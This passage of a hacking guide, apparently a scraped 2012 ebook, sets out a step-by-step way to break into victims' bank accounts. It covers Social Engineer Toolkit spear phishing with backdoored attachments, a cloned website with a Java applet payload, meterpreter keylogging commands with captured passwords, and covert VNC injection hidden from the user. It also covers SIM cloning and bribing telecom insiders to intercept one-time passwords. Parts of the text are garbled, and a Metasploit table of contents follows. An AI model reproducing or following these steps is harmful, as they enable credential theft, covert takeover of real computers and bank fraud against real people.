listener. You would need to transfer the exe onto the victim machine and execute it in order
for it to properly work.
Mass mailer Attack: The mass mailer attack will allow you to send multiple emails to
victims and customize the messages. This option does not allow you to create payloads, so it
is generally used to perform a mass phishing attack.
Teensy USB HID Attack vector: The teensy USB HID attack is a method used by
purchasing a hardware based device from prjc.com and programming it in a manner that
makes the small USB microcontroller to look and feel exactly like a keyboard.
SMS Spoofing Attack Vector: This module allows you to specially craft SMS messages and
send them to a person. You can spoof the SMS source.
Wireless Access Point Attack Vector: it Can be used to set up a rouge wireless access
point, Spoof DNS and redirect all traffic to attacker.
Third Party Modules: This attack vector consists of Third party module RATTE (Remote
Administration Tool Tommy Edition) which is a HTTP tunneling payload. This can be used in
the same way as website attack vectors but with an added advantage of beating security
mechanisms like local Firewall and IPS.
It Seems like I have given you the list of social Engineering

Tools.Well this is how it is done.
There are many ways the black hooded hackers install RATs.
(You can search for Different Social Engineering Tricks to install a
RAT but I present a way using Sprear phising attack vector and
website attack vector)
To begin with, this social engineering toolkit tutorial takes an in-depth look at the spear
phishing attack vectors and website attack vectors.
A spear is a weapon with a

sharp metal point at the end. And phishing is the method used by crackers to trick the user
into believing that fake content and Web pages are in fact genuine.
Spear phishing is a special type of an attack wherein a specific individual is targeted,
rather than a mass of users, analogous to a spear that can be used to attack only one
person at any given point of time. Let us attempt such an attack using the Social Engineer
Toolkit.
Selecting option 1 in the social engineering toolkit menu brings up another menu as shown
in Figure 2. Choose the first option here, to perform a mass mailer attack. This attack sends
an email to the victim with content that we wish to deliver.
Choosing option 10 from the

list of payloads states, Custom EXE to VBA (sent via RAR). This means that we would
send the victim a backdoored rar file.
The various payload options available

are shown in Figure 2, while in Figure 3 we can see how the Social Engineer Toolkit uses
the support from Metasploits meterpreter extension, in spawning a shell and then
controlling it in the remote system.
Once you choose the payload to send to the victim, you must provide the victims email id.
The social engineering toolkit requires the user to login to a valid Gmail account, via which
the payload will be sent. There is also a provision for using any other specified SMTP server
for email.
The social engineering toolkit has predefined templates to choose from. Figure 4 shows the
available templates that can be sent in the form of an email. Customized templates can also
be created and saved for future use. Creating custom templates could be advantageous, as
they have a higher chance of evading spam filters. Such email would reach the inbox of the
victim, who would likely assume it is from a legitimate source.
Website attack vectors

In the social engineering toolkit, the tabnabbing attack method is the one in which you can
clone the entire website and harvest the keystrokes on that webpage on the fake server
hosted by the Social Engineer Toolkit. When the user changes his tabs, he sees the login
page and falls prey to the attack by unwittingly giving out his actual details to the attacker.
Other attacks, such as the

Metasploit browser exploit method, exploit the browser vulnerabilities and pwn
a meterpreter shell in the victim machine thereby giving complete access to the system.
The credential harvester method, as the name suggests, helps in stealing the credentials of
the victim.
Next in the social engineering toolkit

tutorial, choose the template that asks the user forJava Required. In the subsequent
menus, choose the backdoored executableshikata_ga_nai. It is rated very highly,
because it evades antivirus effectively and is also quite powerful in pwning a meterpreter
shell in the victim.
Figure 7 shows details of the cloned Web attack vector and also mentions that this attack
works successfully and has been tested on IE6, IE7, Safari and Firefox. Again we see the
influence of Metasploit in compromising the victim, in this social engineering toolkit.
Figure 8 shows the pop-up window in the browser, prompting the user to install a Java
applet, when the URL browsed is http://192.168.13.128. Should the user click Run, a
meterpreter shell is pwned in the system, giving the attacker control over the victims
machine. This can be used during the penetration testing phase to test the awareness of the
employees within the organization, with respect to social engineering threats.
Thanks to
material.
blog.infosecsolution.com
from where I got the above
What now if you have Installed a meterpreter or RAT you have full
control over the PC you want to hack.
Step 2:
Start KeyLogging.It seems like age old way of hacking but this is
how it is done.
Using Your own meterpreter.
We will first migrate Meterpreter to the Explorer.exe process so that we don't
have to worry about the exploited process getting reset and closing our
session.
meterpreter > ps
Process list
============
PID
Name
-----140
smss.exe
188
winlogon.exe
216
services.exe
228
lsass.exe
380
svchost.exe
408
spoolsv.exe
444
svchost.exe
480
regsvc.exe
500
MSTask.exe
528
VMwareService.exe
Tools\VMwareService.exe
588
WinMgmt.exe
664
notepad.exe
724
cmd.exe
768
Explorer.exe
800
war-ftpd.exe
888
VMwareTray.exe
Tools\VMwareTray.exe
896
VMwareUser.exe
Tools\VMwareUser.exe
940
firefox.exe
972
TPAutoConnSvc.exe
Tools\TPAutoConnSvc.exe
Path
---\SystemRoot\System32\smss.exe
??\C:\WINNT\system32\winlogon.exe
C:\WINNT\system32\services.exe
C:\WINNT\system32\lsass.exe
C:\WINNT\system32\svchost.exe
C:\WINNT\system32\spoolsv.exe
C:\WINNT\System32\svchost.exe
C:\WINNT\system32\regsvc.exe
C:\WINNT\system32\MSTask.exe
C:\Program Files\VMwareVMware
C:\WINNT\System32\WBEMWinMgmt.exe
C:\WINNT\System32\notepad.exe
C:\WINNT\System32\cmd.exe
C:\WINNT\Explorer.exe
C:\Program Files\War-ftpd\war-ftpd.exe
C:\Program Files\VMware\VMware
C:\Program Files\Mozilla Firefox\firefox.exe
1088 TPAutoConnect.exe
Tools\TPAutoConnect.exe
meterpreter > migrate 768

[*] Migrating to 768...
[*] Migration completed successfully.
meterpreter > getpid
Current pid: 768
Finally, we start the keylogger, wait for some time and dump the output.
meterpreter > keyscan_start
Starting the keystroke sniffer...
meterpreter > keyscan_dump
Dumping captured keystrokes...
tgoogle.cm my credit amex
myusernamthi
amexpasswordpassword
Could not be easier! Notice how keystrokes such as control and backspace
are represented.
As an added bonus, if you want to capture system login information you
would just migrate to the winlogon process. This will capture the credentials
of all users logging into the system as long as this is running.
meterpreter > ps
Process list
=================
PID Name
Path
--- ------401 winlogon.exe C:\WINNT\system32\winlogon.exe
meterpreter > migrate 401
[*] Migrating to 401...
[*] Migration completed successfully.
meterpreter > keyscan_start
Starting the keystroke sniffer...
**** A few minutes later after an admin logs in ****
meterpreter > keyscan_dump
Dumping captured keystrokes...

Administrator ohnoes1vebeenh4x0red!
Here we can see by logging to the winlogon process allows us to effectively

harvest all users logging into that system and capture it. We have captured
the Administrator logging in with a password of 'ohnoes1vebeenh4x0red!'.
This means you have access to all the password that a user types.
This means all the email account can be hacked easily and in some cases the
hacker will be able to get Credit Card Info CCV Details and much more.May
be secret lovers also.
But wait I think this turoial was about hacking bank accounts.Hacking bank
becomes difficult as most of the banks come with something called online
keypad and the keys location keeps on changing.So how will you hack such
system.
There are many ways to bypass this too.Most of the RATs allow you to view
the remote computers desktop.Even Meterpreter has the tools to do that.
Remote VNC injection

Using the Metasploit payload for VNC injection, we can also inject a VNC server remotely, and can
have the display thrown back to the host system. Users of the target system user will not notice that
their display is being shared, though there is a trick we have to disable the Metasploit courtesy
shell which appears on the target systems display. If the courtesy shell is not disabled, then it will
show a blue command prompt window at the time of exploitation, as shown in Figure 1.
Figure 1: VNCInjection with courtesy shell enabled, by default
This can warn the users of the target system, and result in attack detection. After disabling the
courtesy shell, it will not display the blue prompt, as you can see in Figure 2.
Figure 2: VNCInjection with courtesy shell disabled
VNC injection can also be used when a user is not logged in; in that case, dont bother to disable the
courtesy shell.
In retrospect It might alarm the victim when a "Metasploit Courtesy Shell" pops up. You can
disable this by setting the option DisableCourtesyShell to true, though. Also, because the
user used the browser just prior to our infection he/she would definitely notice if we
suddenly took over the control of the machine. It is therefore crucial to wait until the path is
clear (if that ever happens). Another way of gaining access, in opposition to java applet
infection, would be preferable because it then doesn't matter if the user is logged in at the
time but be sure you don't disable the courtesy shell in that scenario.
So what you have done is you have got the bank login and password not u can see what
the user is clicking also.
Step 3:
Getting The One Time password.Well This is the most difficult task
that the hacker faces when he tries to find the One time
Password.
Lets have a scenario:
The victim is applying for a online virtual credit card.The
registration process is as follows:
Virtual Credit or debit cards help you keep your actual Credit card details and bank details
confidential specially while shopping online.
How to Create or Generate Online State Bank of India (SBI) Virtual

Credit Card
1. Login to your SBI internet banking (personal banking) account on OnlineSBI website.
2. After you are logged in go to Requests tab.
3. In the left pane go to State Bank Virtual Card option.
4. Fill in the requisite amount. Note that Minimum amount is Rs. 100/- and Maximum
amount limit is Rs. 50,000/-. This means you can not have a virtual credit card with a
virtual credit limit of more than Rs. 50000/-.
Once you are sure of the amount or credit limit, Tick the agreement and click on
Generate button.
5. You will be asked to confirm the details.
6. A One Time Password (OTP) will be sent to your SBI Internet banking registered mobile
number. Enter that password in the next screen.
7. Your SBI Virtual Credit Card will be created and ready for use.
8. You can see status of your SBI Virtual Credit Card anytime by going to the Virtual
Card Details tab. It will show you card status as Used, Unsued or Cancelled.
Upto step 5 the hacker can view what is going on its victims
computer.
Now, Comes the risky job.Its time to hack.
Step 5.1:You need to do some investment in this step.In One of
my acquaintances with a hacker who is into professional bank
hacking in a chatroom.
He told me that he uses duplicate SIM that the victim uses.So he
can get the same message what the victim is getting.
Well according to his claims he can get a duplicate SIM card for
$1000 dollars.
The amount I suppose is for bribing the Insider in
telecommunication department to get the SIM card number of the
victim.
I present the way how to clone a sim after he gets the SIM
number.You dont need to clone a SIM.You can just program it.You
can directly go to page 411 in case you have got the SIM number
from the Insider.
But I present the following steps as proof of Concept:

The stages
Step 1:
Scan the SIM to extract IMSI (just read it!) and Ki, the 128 bit key
(for COMP128-1 only, so far.)
Step 2:
Now put the IMSI and Ki into some card software

Step 3:
And then copy it into a new SIM card
Step 4:
We now have a cloned SIM 2
Step 1:
First we need to read the SIM
A small reader, connected to a serial port.
Home made for $5
Step 1.1:
Then we need to find Ki

We need Ki and IMSI, we can use
Simscan from Dejans pages that will
break COMP128-1
The page bellow shows where to get the software:
Heres the software:
Simscan ready to go.

Now scanning the card
-->Searching for the key
Getting there:
The result slowly appears (this one looksn interesting!)

Now we have it!
This was a SIM supplied to delegates at a meeting, Ki is a bit
obvious isnt it!
Now to create the software

Using some more software from the Internet called KiSsMi we
create the
software for the card.
We now need to program the SIM

We use a single chip PIC computer which is in a SIM shaped
package (GOLD
CARD)
We use a smart card programmer (easily bought on the
Internet)
This is the step hacker uses if he gets SIM number from
the Insider:
The programmer with the card ready to go.
The software for the programmer:

Just load in the software we created with KiSsMi using VxTools.
Charles Brookson is thanked for giving the proof of the concept.
And we now have a cloned card.
Using These steps You can get the OTP.

Bingo the Bank Account has been compromised.So I would
like the banks to take a note on this where this kind of
hacking is prevalent.
Contact me:
scyptaxxeler [at the rate of] gmail {dot} com
I will write the Second Volume in short time.

Comprehensive Journey of A Hacker 2012

Enviado por

Dados do documento

Título original

Direitos autorais

Formatos disponíveis

Compartilhar este documento

Compartilhar ou incorporar documento

Opções de compartilhamento

Você considera este documento útil?

Este conteúdo é inapropriado?

Direitos autorais:

Formatos disponíveis

Comprehensive Journey of A Hacker 2012

Enviado por

Direitos autorais:

Formatos disponíveis

Comprehensive:

Brief overviews of the included topics are:

Heap Spraying, Use after Free, Stack Overflow.

BackTrack Clean Hard Drive Install

complete. Restart when done.

Fix the framebuffer splash by typing fix-splash ( or fix-splash800 if you wish a

BackTrack Dual Boot Install with Windows (Tested on Win 7)

complete. Restart when done.

Fix the framebuffer splash by typing fix-splash ( or fix-splash800 if you wish a

BackTrack Live USB Install

Plug in your USB Drive (Minimum USB Drive capacity 2 GB)

Format the USB drive to FAT32

Download Unetbootin from http://unetbootin.sourceforge.net/

Start Unetbootin and select diskimage (use the backtrack-final ISO)

Install BackTrack in VMWare.

Complete the VMWare tools installation as required. Run fix-splash to reintroduce

the green framebuffer console. Reboot.

Flicked From: Backtrack Official Site.

Well Installation done Lets have some understating of what it

See other screen shot:

httprint is a web server fingerprinting tool. It relies on web server

4:4.7.0really4.4.2metapackage for the Phonon multimedia framework

4:4.7.0really4.4.2Phonon Xine 1.1.x backend

images. It is capable of detecting several different steganographic methods to

1.9.2.17+build3+nobinonlyXUL + XPCOM application runner

End of the tools.

Chapter 2:The Metasploit Framework

command prompt (see Chapter 5), whereas a bind shell is a

system enumeration. These interchangeable modules are the core

Msfconsole is by far the most popular part of the Metasploit

interface to almost every option and setting available in the

To launch msfconsole, enter msfconsole at the command line:

Msfcli provides a powerful command-line interface to the

If you aren't entirely sure about what options belong to a

string at whichever point you are stuck.Thats why they say

root@bt4:/pentest/exploits/framework3# ./msfcli windows/smb/ms08_067_netapi O

The back Command

will only carry over if they are set globally.

The check Command

msf exploit(ms04_045_wins) > show options

Name Current Setting Required Description

The connect Command

By passing the '-s' argument to connect, it will connect via SSL:

exploit vs. run

Attempting to crash the remote host...

The irb Command

The jobs Command

-k Terminate the specified job name.

The load Command

The resource Command

The route Command

The info Command

The set/unset Commands

The sessions Command

The search Command

The show Command

aix/ppc/shell_bind_tcp AIX Command Shell, Bind TCP Inline

If you aren't certain whether an operating system is vulnerable to a particular exploit,

Description : The local client address

The setg Command

The use Command

Active Exploit Example

Passive Exploit Example